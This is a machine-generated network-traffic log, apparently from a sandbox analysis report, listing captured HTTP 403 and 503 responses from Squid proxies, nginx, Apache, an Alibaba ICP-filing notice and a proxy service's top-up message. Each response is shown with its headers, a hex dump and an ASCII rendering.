                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:09 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squidMime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:11 GMTContent-Type: text/html;charset=utf-8Content-Length: 17X-Squid-Error: ERR_ACCESS_DENIED 0X-Cache: MISS from cdn-fintech.infoX-Cache-Lookup: NONE from cdn-fintech.info:8123Connection: keep-aliveData Raw: 45 52 52 5f 41 43 43 45 53 53 5f 44 45 4e 49 45 44 Data Ascii: ERR_ACCESS_DENIED
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.22.1Date: Sat, 09 Mar 2024 12:15:12 GMTContent-Type: text/htmlContent-Length: 555Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.22.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable M
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:12 GMTServer: ApacheContent-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableServer: squid/4.6Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:07 GMTContent-Type: text/html;charset=utf-8Content-Length: 3773X-Squid-Error: ERR_DNS_FAIL 0Vary: Accept-LanguageContent-Language: enData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 38 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f Data Ascii: <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><meta type="copyright" content="Copyright (C) 1996-2018 The Squid Software Foundation and contributors"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>ERRO
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/6.0.0-20220501-re899e0c27Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3670X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enCache-Status: ezproxies.comVia: 1.1 ezproxies.com (squid/6.0.0-20220501-re899e0c27)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 32 32 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 65 72 64 61 6e
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Sat, 09 Mar 2024 12:15:13 GMTContent-Length: 101Content-Type: text/plain; charset=utf-8Data Raw: 48 54 54 50 2f 31 2e 31 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 50 6c 65 61 73 65 20 74 6f 70 75 70 3a 20 68 74 74 70 73 3a 2f 2f 61 73 6f 63 6b 73 2e 63 6f 6d 2f 61 64 64 2d 6d 6f 6e 65 79 2f 64 65 64 34 66 62 38 66 33 33 38 39 66 63 39 61 34 34 63 39 37 37 39 63 64 33 30 39 36 33 62 37 0d 0a Data Ascii: HTTP/1.1 403 ForbiddenPlease topup: https://asocks.com/add-money/ded4fb8f3389fc9a44c9779cd30963b7
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: squid/3.5.20Mime-Version: 1.0Date: Sat, 09 Mar 2024 12:15:13 GMTContent-Type: text/html;charset=utf-8Content-Length: 3661X-Squid-Error: ERR_ACCESS_DENIED 0Vary: Accept-LanguageContent-Language: enX-Cache: MISS from ezproxies.comX-Cache-Lookup: NONE from ezproxies.com:58378Via: 1.1 ezproxies.com (squid/3.5.20)Connection: keep-aliveData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 74 79 70 65 3d 22 63 6f 70 79 72 69 67 68 74 22 20 63 6f 6e 74 65 6e 74 3d 22 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 22 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 72 65 74 72 69 65 76 65 64 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 0a 20 2f 2a 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 43 29 20 31 39 39 36 2d 32 30 31 36 20 54 68 65 20 53 71 75 69 64 20 53 6f 66 74 77 61 72 65 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 0a 20 2a 0a 20 2a 20 53 71 75 69 64 20 73 6f 66 74 77 61 72 65 20 69 73 20 64 69 73 74 72 69 62 75 74 65 64 20 75 6e 64 65 72 20 47 50 4c 76 32 2b 20 6c 69 63 65 6e 73 65 20 61 6e 64 20 69 6e 63 6c 75 64 65 73 0a 20 2a 20 63 6f 6e 74 72 69 62 75 74 69 6f 6e 73 20 66 72 6f 6d 20 6e 75 6d 65 72 6f 75 73 20 69 6e 64 69 76 69 64 75 61 6c 73 20 61 6e 64 20 6f 72 67 61 6e 69 7a 61 74 69 6f 6e 73 2e 0a 20 2a 20 50 6c 65 61 73 65 20 73 65 65 20 74 68 65 20 43 4f 50 59 49 4e 47 20 61 6e 64 20 43 4f 4e 54 52 49 42 55 54 4f 52 53 20 66 69 6c 65 73 20 66 6f 72 20 64 65 74 61 69 6c 73 2e 0a 20 2a 2f 0a 0a 2f 2a 0a 20 53 74 79 6c 65 73 68 65 65 74 20 66 6f 72 20 53 71 75 69 64 20 45 72 72 6f 72 20 70 61 67 65 73 0a 20 41 64 61 70 74 65 64 20 66 72 6f 6d 20 64 65 73 69 67 6e 20 62 79 20 46 72 65 65 20 43 53 53 20 54 65 6d 70 6c 61 74 65 73 0a 20 68 74 74 70 3a 2f 2f 77 77 77 2e 66 72 65 65 63 73 73 74 65 6d 70 6c 61 74 65 73 2e 6f 72 67 0a 20 52 65 6c 65 61 73 65 64 20 66 6f 72 20 66 72 65 65 20 75 6e 64 65 72 20 61 20 43 72 65 61 74 69 76 65 20 43 6f 6d 6d 6f 6e 73 20 41 74 74 72 69 62 75 74 69 6f 6e 20 32 2e 35 20 4c 69 63 65 6e 73 65 0a 2a 2f 0a 0a 2f 2a 20 50 61 67 65 20 62 61 73 69 63 73 20 2a 2f 0a 2a 20 7b 0a 09 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 76 6
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: BeaverCache-Control: no-cacheContent-Type: text/htmlContent-Length: 635Connection: closeData Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>
